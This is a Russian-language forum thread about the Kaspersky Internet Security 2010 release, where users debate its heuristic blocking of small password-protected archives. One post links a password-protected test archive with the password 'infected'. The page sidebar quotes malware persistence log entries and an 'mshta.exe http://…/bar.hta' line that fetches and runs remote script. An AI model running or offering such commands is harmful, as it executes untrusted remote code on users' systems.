Перейти к содержанию

Recommended Posts

GAndrey
25 августа начало продаж, а ещё тестирование не начаналось:) как так?

Тестирование ведется внутренними тестерами ЛК, ничего плохого в этом не вижу. Точно также было со сборкой 9.0.0.463.

Продавать будут готовый CF1 (9.0.0.463), а тестировать собираются следующую версию - CF2.

А пиратка Win7 бодренько шагает по стране.

+1

При установке будет предложено скачать новую сборку, очень много производителей софта практикуют такой подход.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion

Хотят сорвать куш дважды :)

-громкая реклама - начало продаж новой версии

-новая версия теперь поддерживает Windows 7

^__^

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Skorpion

Какой куш, если лицензии новой не требуется?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Yen-Jasker
Тестирование ведется внутренними тестерами ЛК, ничего плохого в этом не вижу. Точно также было со сборкой 9.0.0.463.

+1

При установке будет предложено скачать новую сборку, очень много производителей софта практикуют такой подход.

При тестировании тестировалась фича - уведомление в главном окне продукта о наличии новой сборки. И новостной агент.

Обе фичи всех задолбали, потому что их не отключали, тестировали.

Но когда вышли техрелизы, обе эти фичи не используются.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion

А где у KIS 9.0.0.463 настройка исключений?

--

добавлено:

через другой скин всё норм

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ummitium
При тестировании тестировалась фича - уведомление в главном окне продукта о наличии новой сборки. И новостной агент.

Обе фичи всех задолбали, потому что их не отключали, тестировали.

Но когда вышли техрелизы, обе эти фичи не используются.

Да, помнится, постоянно выскакивало уведомление о праздновании 9 Мая :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik
А где у KIS 9.0.0.463 настройка исключений?

Безымянный.jpg

post-3736-1249832043_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
ak_

Сколько травили Авиру за групповой детект и за пакеры-крипторы, но тут ЛК явно обошла Авиру :)

e4c6gU6sR2.jpg

Архив под паролем = заражён! Ванга отдыхает. :)

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Не совсем так.

ZIP-архив малого размера под паролем - возможно зараза. :) Пассворд-протектед-екзе - это эврестический детект, а не сигнатурный.

  • Downvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
ak_

Offtop

А ещё можно научить KIS убивать ZIP-архивы с паролем infected. Это 100% коварный юзер приготовил зловред для отправки во вражеский вирлаб. :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Burbulator

Подскажите, пожалуйста,

данное сообщение от kis2010 говорит о том, что программа была добавлена в сильно ограниченные, потому что она находится в базах данных ЛК или по результатам работы хипса и т.п.?

Спасибо

kisq.jpg

post-4068-1254056191_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Явно же написано, что по базе данных ЛК. :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Yen-Jasker
Не совсем так.

ZIP-архив малого размера под паролем - возможно зараза. :) Пассворд-протектед-екзе - это эврестический детект, а не сигнатурный.

Мне казалось, что эвристика предполагает анализ файла или его действий. Реагирование на "размер архива + пароль" это не эвристика, а глупость.

В конце-концов, КИС не знает что в архиве. Если даже там зараза, то она не повредит пользователю, потому что она в архиве, а для запуска нужно ввести пароль на архив. Если бы КИС ругался на этот архив после того как он скачан (эвристика ФА), это еще можно принять, лишнее предупреждение не помешает, а файл всегда можно добавить в Исключения.

Если даже там есть зараза, то даже домохозяйке будет непросто заразить компьютер, нужно зайти в архив, ввести пароль, запустить файл из архива, у АВ есть масса шансов поймать уже распакованную, пытающуюся запустится заразу.

Но запрещать закачку безопасного файла , потому что он маленького размера и защищен паролем - это глупость.

Такая же глупость, как детект продуктами других производителей АВ файлов, упакованных UPX только потому что они упакованы UPX. За это фанаты ЛК устраивают конкурентам разнос и всячески их опускают.

Но если глупость сделала ЛК - то обязательно находится желающие ее оправдать. Надеюсь что такая "теодицея" ЛК со стороны фанатов щедро оплачивается и надеюсь что оправдывающие понимают как они выглядят со стороны, пытаясь оправдать подобные маразмы АВ.

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
chk
Если даже там есть зараза, то даже домохозяйке будет непросто заразить компьютер, нужно зайти в архив, ввести пароль, запустить файл из архива, у АВ есть масса шансов поймать уже распакованную, пытающуюся запустится заразу.

Но запрещать закачку безопасного файла , потому что он маленького размера и защищен паролем - это глупость.

Глупость - это с глубокомысленным и важным видом нравоучительно рассуждать о том, чего не знаешь. По факту же - выходит демонстрация вашей ограниченности и зашоренности.

Но если вы захотите развиваться, то могу дать подсказку для последующих логических выводов : эл.почта.

  • Downvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
deviss
Но если вы захотите развиваться, то могу дать подсказку для последующих логических выводов : эл.почта.

Я не специалист, возможно кто-то даст пояснение, чем принципиально отличается порядок действий пользователя в данном случае? Ну, положим, по почте пришло сообщение с вложенным запароленным архивом, ну положим этот архив - зараза (если пришло неведомо откуда, то скорее всего ТОЧНО зараза, однако бывают случаи, когда антивирус на почтовом сервере просто не пропускает архивы (особенно, если внутри какой-нибудь исполняемый файл), поэтому приходится на них ставить пароли). Но, чтобы зараза смогла действовать, все равно ведь надо тот архив: 1. открыть (введя пароль) 2. запустить то, что имеется в данном архиве (ну пусть это самораспаковывающийся архив, но ведь все равно пароль надо ввести). А ведь на компе на страже куча всего стоит (целый KAV/KIS, который тебе и память мониторит, и файловый антивирь не спит, хипс, опять-таки, хороший).

Так что зерно здравого смысла все-таки имеется в непонимании критерия срабатывания антивируса по схеме маленький архив+запаролен=злой зловред.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Yen-Jasker

Зачем все эти пространственные рассуждения? Не нравится "эвристический"? Ну так вот: "Эвристические знания - знания, накапливаемые интеллектуальной системой в процессе ее функционирования, а также знания, заложенные в ней априорно, но не имеющие статуса абсолютной истинности в данной проблемной области. Обычно эвристические знания связаны с отражением в базе знаний неформального опыта решения задач."

А детект этот был минимум с 5-ки, т.е. ему уже лет 9.

deviss

Вам верно сказали. И в начале 00-х я сам получал такие письма с заразой.

маленький архив+запаролен=злой зловред

Принципиальная ошибка. Не =, а "предположительно".

ak_

Кстати, а по ссылке была не зараза?

  • Downvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
ak_
ak_

Кстати, а по ссылке была не зараза?

Зловредом поделились на одном из форумов для тестирования антивирусной защиты, получатель знал, что внутри.

Можете проверить, как KIS среагирует на эту ссылку: http://narod.ru/disk/13593585000/not.zip.html

Добавлено: можно не проверять: http://www.virustotal.com/ru/analisis/2f76...a054-1254115164

А там блокнот. Пароль infected :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion

при чём не на все запароленные архивы ругается))))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik
Зловредом поделились на одном из форумов для тестирования антивирусной защиты, получатель знал, что внутри.

Ой. Т.е. защита верно отработала, не так ли? :)

А кто может сказать, столько реально было фолсов этого типа детекта с 2000 года у каждого лично?

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Yen-Jasker
Yen-Jasker

Зачем все эти пространственные рассуждения? Не нравится "эвристический"? Ну так вот: "Эвристические знания - знания, накапливаемые интеллектуальной системой в процессе ее функционирования, а также знания, заложенные в ней априорно, но не имеющие статуса абсолютной истинности в данной проблемной области. Обычно эвристические знания связаны с отражением в базе знаний неформального опыта решения задач."

А детект этот был минимум с 5-ки, т.е. ему уже лет 9.

Не нравится что КИС решает за меня, что мне можно качать, а что нельзя, да еще принимает это решение необоснованно, не по результатам анализа подозрительного файла, а только потому что это маленький архив, защищенный паролем. Ну вот показалось домохозяйскому АВ :D.

Вердикт "Заражен: Password-protected.EXE" в окне это полный маразм :D.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Yen-Jasker

Ты проверь сам, ага?

pswd.PNG

Как видишь, можно легко сделать исключение. Качай, никто за тебя не решает.

И как это не обоснованно? Мы же выяснили, что был детект на вредонос. А что касается блокнота, ну так ты сколько раз в своей жизни передавал notepad в архиве с паролем другому человеку?

З.Ы. Детект на скрине тоже верный - на Backdoor.Win32.Bredavi.ck

Посмотрел на дату. Этот детект с 2004-го года есть. Вот, значит сколько каждый из "удивленных" может назвать фолсов этого детекта, которые не позволили скачать легитимную программу или привели к удалению такой?

post-3736-1254120762_thumb.png

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Yen-Jasker
Yen-Jasker

Ты проверь сам, ага?

Как видишь, можно легко сделать исключение. Качай, никто за тебя не решает.

Мы говорили об алерте веб-антивируса, запрете закачивать файл.

http://www.anti-malware.ru/forum/index.php...ost&p=81820

А против алертов, возникающих при проверке файлов, уже скачанных, я не возражал.

Если бы КИС ругался на этот архив после того как он скачан (эвристика ФА), это еще можно принять, лишнее предупреждение не помешает, а файл всегда можно добавить в Исключения.

http://www.anti-malware.ru/forum/index.php...ost&p=81843

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
mennen

Полностью согласен с Umnik, а вообще кто-то пользуется песочницей в KIS? Настройки стоят у Вас по максимуму или по умолчанию??

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik
Мы говорили об алерте веб-антивируса, запрете закачивать файл.

Тебя научить попадать в кнопочку Allow на алерте Веб-антивируса?

mennen

Я пользуюсь. У меня сейчас стандартные настройки песочницы, интерактивный режим работы.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • PR55.RP55
      "времени на раскачку нет"  https://forum.kasperskyclub.ru/index.php?s=35fdc94435f2493d0ac8d0282ba035f4&showtopic=64721 HKLM\...\Run: [1corona.exe] => C:\Windows\System32\1corona.exe [94720 2020-02-14] () [File not signed]
      C:\Windows\System32\1corona.exe
      Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe [2020-02-16] () [File not signed]
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe
      Startup: C:\Users\Dmitriy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe [2020-02-16] () [File not signed]
      C:\Users\Dmitriy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe
      Startup: C:\Users\dostyp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe [2020-02-14] () [File not signed]
      C:\Users\dostyp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1corona.exe
      2020-02-16 17:22 - 2020-02-16 17:22 - 000094720 _____ C:\Users\Dmitriy\AppData\Roaming\1corona.exe
      C:\Users\Dmitriy\AppData\Roaming\1corona.exe ------------------ А в uVS это была бы одна команда....  " Удалить файл и все родственные файлы" 
    • dompokypok1
      Работаю над проектом интернет-магазина вроде все урезал ужал и жаль что еще можно сделать.
    • dgek2022
      Японская кухня пользуется популярностью по всей России. Традиционная еда из риса и морепродуктов – это прекрасная альтернатива привычному ужину или обеду. Наше кафе японской кухни предлагает удобную услугу – доставка суши, сеты, роллы и других блюд в Томске на дом или в офис. Для больших компаний у нас есть особенные предложения. Зачем куда-то ходить, если можно в любой момент заказать блюда японской кухни. Делая заявку в нашем кафе «Джекина Доставка», вы получаете свежий продукт. Для приготовления используются только натуральные ингредиенты. Особого внимания заслуживает дизайнерская упаковка из экосырья. Эстетичный вид и вкусные японские блюда – все это по доступной цене.
    • dompokypok1
      Периодически у компаний и частных лиц (реже) возникает задача по рейтингованию идей сотрудников или клиентов. Хороший инструмент — параметрические таблицы выбора. Лучшая реализация таблиц выбора на сайте https://choser.ru в choser.ru можно создать неограниченно большие списки/рейтинги идей/рационализаторских предложений/инноваций и за секунды менять приоритеты параметров, фильтры и сортировки для поиска или выбора лучших. Сам практикую использование параметрических таблиц для своих более чем 6400 идей, а так же многократно использовал аналогичный подход для рейтингования/конкурсов на предприятиях. Так что рекомендую  Официальный блог проекта см. https://4choser.ru
    • PR55.RP55
      cscript.exe https://tproger.ru/news/winrm-vbs-windows/ https://vms.drweb.com/virus/?i=8365848&lng=en https://vms.drweb.ru/virus/?i=4154287 O22 - Task: \Microsoft\Windows\Server Manager\CleanupOldPerfLogs - C:\Windows\system32\cscript.exe /B /nologo C:\Windows\system32\calluxxprovider.vbs $(Arg0) $(Arg1) $(Arg2)
      mshta.exe mshta.exe c:\temp.hta
      Mshta.exe http://www.******.com/bar.hta
×